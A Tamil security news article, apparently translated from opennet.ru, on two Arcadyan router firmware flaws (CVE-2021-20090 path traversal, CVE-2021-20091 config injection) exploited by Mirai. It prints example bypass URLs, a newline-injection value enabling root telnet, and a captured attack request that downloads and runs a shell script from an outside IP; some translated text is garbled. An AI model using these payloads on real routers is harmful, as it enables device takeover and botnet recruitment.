17 உற்பத்தியாளர்களை பாதிக்கும் வீட்டு திசைவிகளில் பாதிப்பு

Arcadyan நிறுவனத்தில் இருந்து HTTP சர்வர் செயலாக்கத்தை ஃபார்ம்வேர் பயன்படுத்தும் ஹோம் ரவுட்டர்களுக்கு எதிராக நெட்வொர்க்கில் பாரிய தாக்குதல் பதிவு செய்யப்பட்டுள்ளது. சாதனங்கள் மீது கட்டுப்பாட்டைப் பெற, இரண்டு பாதிப்புகளின் கலவை பயன்படுத்தப்படுகிறது, இது ரூட் உரிமைகளுடன் தன்னிச்சையான குறியீட்டை தொலைவிலிருந்து செயல்படுத்த அனுமதிக்கிறது. சிக்கல் Arcadyan, ASUS மற்றும் Buffalo ஆகியவற்றிலிருந்து பரவலான ADSL ரவுட்டர்களையும், பீலைன் பிராண்டுகளின் கீழ் வழங்கப்படும் சாதனங்களையும் பாதிக்கிறது (Smart Box Flash இல் சிக்கல் உறுதிப்படுத்தப்பட்டுள்ளது), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone மற்றும் மற்ற தொலைத்தொடர்பு ஆபரேட்டர்கள். 10 ஆண்டுகளுக்கும் மேலாக Arcadyan firmware இல் சிக்கல் உள்ளது மற்றும் இந்த நேரத்தில் 20 வெவ்வேறு உற்பத்தியாளர்களிடமிருந்து குறைந்தபட்சம் 17 சாதன மாடல்களுக்கு மாற்ற முடிந்தது என்பது குறிப்பிடத்தக்கது.

முதல் பாதிப்பு, CVE-2021-20090, அங்கீகாரம் இல்லாமல் எந்த இணைய இடைமுக ஸ்கிரிப்டையும் அணுகுவதை சாத்தியமாக்குகிறது. பாதிப்பின் சாராம்சம் என்னவென்றால், இணைய இடைமுகத்தில் படங்கள், CSS கோப்புகள் மற்றும் ஜாவாஸ்கிரிப்ட் ஸ்கிரிப்டுகள் அனுப்பப்படும் சில கோப்பகங்கள் அங்கீகாரம் இல்லாமல் அணுகக்கூடியவை. இந்த வழக்கில், அங்கீகாரம் இல்லாமல் அணுகல் அனுமதிக்கப்படும் அடைவுகள் ஆரம்ப முகமூடியைப் பயன்படுத்தி சரிபார்க்கப்படுகின்றன. மூலக் கோப்பகத்திற்குச் செல்வதற்கான பாதைகளில் “../” எழுத்துக்களைக் குறிப்பிடுவது ஃபார்ம்வேரால் தடுக்கப்பட்டது, ஆனால் “..%2f” கலவையைப் பயன்படுத்துவது தவிர்க்கப்பட்டது. எனவே, “http://192.168.1.1/images/..%2findex.htm” போன்ற கோரிக்கைகளை அனுப்பும்போது பாதுகாக்கப்பட்ட பக்கங்களைத் திறக்க முடியும்.

இரண்டாவது பாதிப்பு, CVE-2021-20091, ஒரு அங்கீகரிக்கப்பட்ட பயனரை, குறிப்பாக வடிவமைக்கப்பட்ட அளவுருக்களை apply_abstract.cgi ஸ்கிரிப்ட்டுக்கு அனுப்புவதன் மூலம் சாதனத்தின் கணினி அமைப்புகளில் மாற்றங்களைச் செய்ய அனுமதிக்கிறது, இது அளவுருக்களில் புதிய வரி எழுத்து இருப்பதைச் சரிபார்க்காது. . எடுத்துக்காட்டாக, ஒரு பிங் செயல்பாட்டைச் செய்யும்போது, ​​தாக்குபவர் "192.168.1.2%0AARC_SYS_TelnetdEnable=1" ஐபி முகவரியுடன் புலத்தில் உள்ள மதிப்பைக் குறிப்பிட முடியும் .glbcfg, "AARC_SYS_TelnetdEnable=1" என்ற வரியை அதில் எழுதும் ", இது telnetd சேவையகத்தை செயல்படுத்துகிறது, இது ரூட் உரிமைகளுடன் கட்டுப்பாடற்ற கட்டளை ஷெல் அணுகலை வழங்குகிறது. இதேபோல், AARC_SYS அளவுருவை அமைப்பதன் மூலம், நீங்கள் கணினியில் எந்த குறியீட்டையும் இயக்கலாம். முதல் பாதிப்பானது, "/images/..%2fapply_abstract.cgi" என அணுகுவதன் மூலம், அங்கீகாரம் இல்லாமல் ஒரு சிக்கலான ஸ்கிரிப்டை இயக்குவதை சாத்தியமாக்குகிறது.

பாதிப்புகளைப் பயன்படுத்திக் கொள்ள, இணைய இடைமுகம் இயங்கும் நெட்வொர்க் போர்ட்டிற்குத் தாக்குபவர் ஒரு கோரிக்கையை அனுப்ப வேண்டும். தாக்குதலின் பரவலின் இயக்கவியல் மூலம் ஆராயும்போது, ​​பல ஆபரேட்டர்கள் தங்கள் சாதனங்களில் வெளிப்புற நெட்வொர்க்கிலிருந்து அணுகலை விட்டுவிட்டு, ஆதரவு சேவை மூலம் சிக்கல்களைக் கண்டறிவதை எளிதாக்குகிறார்கள். இடைமுகத்திற்கான அணுகல் உள் நெட்வொர்க்கில் மட்டுமே இருந்தால், "டிஎன்எஸ் ரீபைண்டிங்" நுட்பத்தைப் பயன்படுத்தி வெளிப்புற நெட்வொர்க்கில் இருந்து தாக்குதலை மேற்கொள்ளலாம். மிராய் பாட்நெட்டுடன் ரவுட்டர்களை இணைக்க, பாதிப்புகள் ஏற்கனவே தீவிரமாகப் பயன்படுத்தப்படுகின்றன: POST /images/..%2fapply_abstract.cgi HTTP/1.1 இணைப்பு: நெருங்கிய பயனர்-ஏஜெண்ட்: டார்க் ஆக்ஷன்=start_ping&submit_button=ping.html& action_params=3blinktime.5. 212.192.241.7%0A ARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://212.192.241.72/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4

ஆதாரம்: opennet.ru

கருத்தைச் சேர்